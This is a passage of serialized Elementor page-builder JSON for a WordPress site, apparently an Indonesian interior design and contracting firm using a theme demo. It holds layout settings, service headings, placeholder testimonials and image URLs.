penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 